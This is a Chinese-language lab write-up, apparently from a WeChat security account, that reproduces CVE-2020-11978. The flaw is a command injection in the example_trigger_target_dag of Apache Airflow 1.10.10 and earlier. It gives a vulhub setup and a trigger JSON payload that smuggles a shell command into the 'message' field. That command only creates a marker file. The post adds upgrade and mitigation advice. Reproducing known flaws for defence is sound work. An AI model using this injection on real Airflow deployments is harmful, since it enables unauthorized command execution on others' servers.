Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令Apache Airflow<=1.10.10在 Airflow 附带的一个示例DAG= example_trigger_target_dag允许任何经过身份验证的用户以运行Airflow工作程序/调度程序的用户身份运行任意命令。
影响版本
Apache Airflow <= 1.10.10
漏洞环境
依然用vulhub搭建,依次执行以下命令启动airflow 1.10.10:
#初始化数据库
docker-compose run airflow-init#启动服务
docker-compose up -d漏洞复现
访问http://your-ip:8080进入airflow管理端
example_trigger_target_dag前面的Off改为On,再点击执行按钮
在Configuration JSON中输入:
{"message":"'";touch/tmp/airflow_dag_success;#"},
再点Trigger执行DAG:
几秒后可以看到执行成功:
到CeleryWorker容器中进行查看:
docker-compose exec airflow-worker ls -l /tmp
可以看到touch /tmp/airflow_dag_success成功被执行
修复建议
1、升级到1.10.10之后版本
2、删除或禁用默认DAG(可自行删除或在配置文件中禁用默认DAGload_examples=False)
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(无问之路):CVE-2020-11978—Apache Airflow 示例dag中的命令注入漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论